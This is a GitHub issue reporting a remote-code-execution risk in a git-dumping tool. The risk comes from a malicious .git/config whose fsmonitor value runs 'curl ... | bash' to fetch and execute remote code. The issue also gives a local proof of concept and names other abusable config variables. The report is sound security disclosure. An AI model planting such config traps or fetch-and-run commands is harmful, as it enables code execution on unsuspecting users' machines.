Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security risk - RCE in .git/config #42

Open
ZanyMonk opened this issue Feb 26, 2024 · 1 comment
Open

Security risk - RCE in .git/config #42

ZanyMonk opened this issue Feb 26, 2024 · 1 comment

Comments

@ZanyMonk
Copy link
Contributor

ZanyMonk commented Feb 26, 2024

I recently came across a weird .git/config file against which this tool is totally vulnerable.

[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        fsmonitor = "bash -c 'curl -s https://[redacted]/static/img/[redacted].js | bash'"
[user]
        email = [redacted]

The command set as fsmonitor value gets executed when issuing several git commands, including the final git checkout . made by git-dumper to rebuild the worktree.

Here is a simple method to create such git-trap locally to test its behavior:

mkdir /tmp/evilgit
cd /tmp/evilgit
git init
cat >> .git/config <<EOF
        fsmonitor = "sh -c 'xcalc &' | echo 0"
EOF

# Trigger the trap
git checkout .

There are several other configuration variables that could be used to achieve similar results (sshCommand, askPass, editor, pager and there could be more).

Solve the problem

A way to protect ourselves from this kind of thing is to check the config file for dangerous configuration variables (which everyone should do manually anyways) and comment them automatically before running any git command.

@arthaud
Copy link
Owner

arthaud commented Feb 26, 2024

Thanks for the report. This is indeed a known problem, as mentioned in the README.

Agreed with your proposal. An easy fix would be to comment out the .git/config before runing any git command.
Feel free to submit a PR :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants